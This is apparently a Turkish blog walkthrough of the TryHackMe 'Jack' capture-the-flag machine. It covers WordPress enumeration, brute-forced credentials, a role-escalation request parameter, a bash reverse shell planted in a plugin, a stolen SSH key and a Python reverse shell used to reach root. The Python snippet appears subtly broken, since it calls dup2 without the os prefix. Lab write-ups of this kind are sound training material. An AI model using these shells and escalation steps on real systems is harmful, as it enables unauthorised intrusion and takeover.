Bu yazımda sizlere Tryhackme Jack Makine Çözümü anlatmaya çalışacağım.
- Makine İsmi: Jack
- Makine Seviyesi: Zor
- Oda Linki: https://tryhackme.com/room/jack
1- İlk olarak makine ip adresi ile jack.thm olan domaini hostumu ekleyerek başlıyorum. Ctrl+x yaparak kaydedip çıkalım.
Hosta eklemek için sudo nano /etc/hosts kısmından yapabilirsiniz.
2- Klasik bir nmap taraması yaparak başlıyorum. 2 port açık ve detaylı incelemede karşı tarafta wordpress CMS olduğunu tespit ediyorum. Dizin taraması yaparak devam edelim.
3- Gobuster aracılığıyla tarama yaptım ve işimize yarayacak bir şeyler bulamadım. Direkt bu adımı da geçerek wordpress güvenlik açığı taraması yapmayı amaçlıyorum.
4- Normal bir wp taraması yaptım ama pek işe yarar bir şey bulamadım. Farklı bir tarama yöntemi seçerek direkt olarak kullanıcıları tespit etmeye çalışıyorum.
wpscan -e u –url http://jack.thm olarak tarıyorum.
Tarama sonucunda karşımıza 3 tane kullanıcı çıktı.
Bu kullanıcıları masaüstünde yeni bir not defteri alt alta ekleyip kaydedin çıkalım.
5- WordPress paneline brute force saldırı aşamasına geçiyorum. Ben önceden makineyi çözdüğüm için bu adım uzun sürdüğü için pas geçiyorum.
6- Direkt user ve pass sizlere veriyorum. Çok uzun sürdüğü için yarıda kestim bu makineyi önceden çözdüğüm için sizin beklemenize gerek yok. 🙂
User: wendy
Pass: changelater
7- Panelden içeri girdiğimde bir şey bulamadım yetki yükseltmeye izin vermiyor. Eklentiler kısmından araştırma yaparken burpsuite üzerinden parametre ekleyerek direkt admin içerisine geçiş yapabileceğimizi fark ettim.
WordPress panelinden profil kısmına gelip sıra sıra;
- Tarayıcı Ağ Ayarlarına girip Vekil sunucuyu elle ayarla kısmına gelip İp adresi kısmına VPN ip adresiniz port kısmına 8080 yazıp kaydedip çıkın.
- Burpsuite kısmını açıp proxy kısmına girip edit > spesicif ip adresi > kaydet yapıp çıkın.
- Incercept is on yapıp wordpress panelinden profil kısmında ki alt kısımda ki kaydet tıklayınca direkt bu ekran gelecektir.
- pass=2& kısmının tam yanına gelip ure_other_roles=administrator kısmını ekleyin.
8- Forward bir iki kez tıklayıp daha sonra ıntercept is off yapıp admin panelini yenileyelim.
İlginizi çekebilecek yazımız: Hackthebox Soccer Makine Çözümü
9- Gördüğünüz gibi direkt olarak admin içerisine geçiş yaptık. Theme editör kısmına girip shell almaya çalışacağız.
10- Önce ncat -lvnp 9001 yazıp daha sonra direkt akismet.php altına gelip;
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/vpnipadresiniz/9001 0>&1′”); yazıp kaydedelim.
11- Plugins kısmına gelip aktif ediyoruz ve direkt shell terminalimize gelecektir.
12- Direkt home dizininden jack içerisine geçiş yaptık ve ilk bayrağımıza bulmuş olduk.
13- Burada ss almayı unuttuğum için adım adım yazıyorum.
- Öncelikle cd /var/backups kısmına geçiş yapalım.
- cat id_rsa yapalım.
- BEGIN RSA PRIVATE KEY’den end rsa private key’e tamamını kopyalayalım.
- Masaüstünde mousepad açıp içerisine RSA private key ekleyip id_rsa olarak kaydedip çıkalım.
- chmod 600 id_rsa yetkiyi düzenledik.
- ssh -i id_rsa [email protected]
Direkt olarak jack kullanıcısının içerisindeyiz.
14- Pspy64 yükleyerek yetki yükseltmek için araştırma yaptım. /opt/statuscheck/checker.py içerisinden direkt olarak yetki yükseltebileceğimizi tespit ettim.
15- Os.system üzerinden yetki yükseltebileceğimizi fark ettim. Python 2.7 Os üzerinden shell ile yetki yükseltme aşamasına geçebiliriz.
16- Dizin konumunu tespit ettim. Nano ile direkt en altına shellimizi ekleyerek çalıştırdığımızda root içerisine geçiş yapabileceğiz.
17- En alt kısmına gelip ekledik ve CTRL+X yapıp kaydedip çıkalım.
import socket
import pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“Vpnipadresiniz”, 4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn(“/bin/bash”)
s.close()
18- python2 os.py veya python os.py olarak çalıştırıp biraz beklediğinizde direkt olarak root içerisine geçiş yaptık.
Son bayrağımızda bularak Tryhackme Jack Makine Çözümü yazımın sonuna geldim.
Umarım işinize yarar yeni yazılarda görüşmek üzere, kendinize iyi bakın..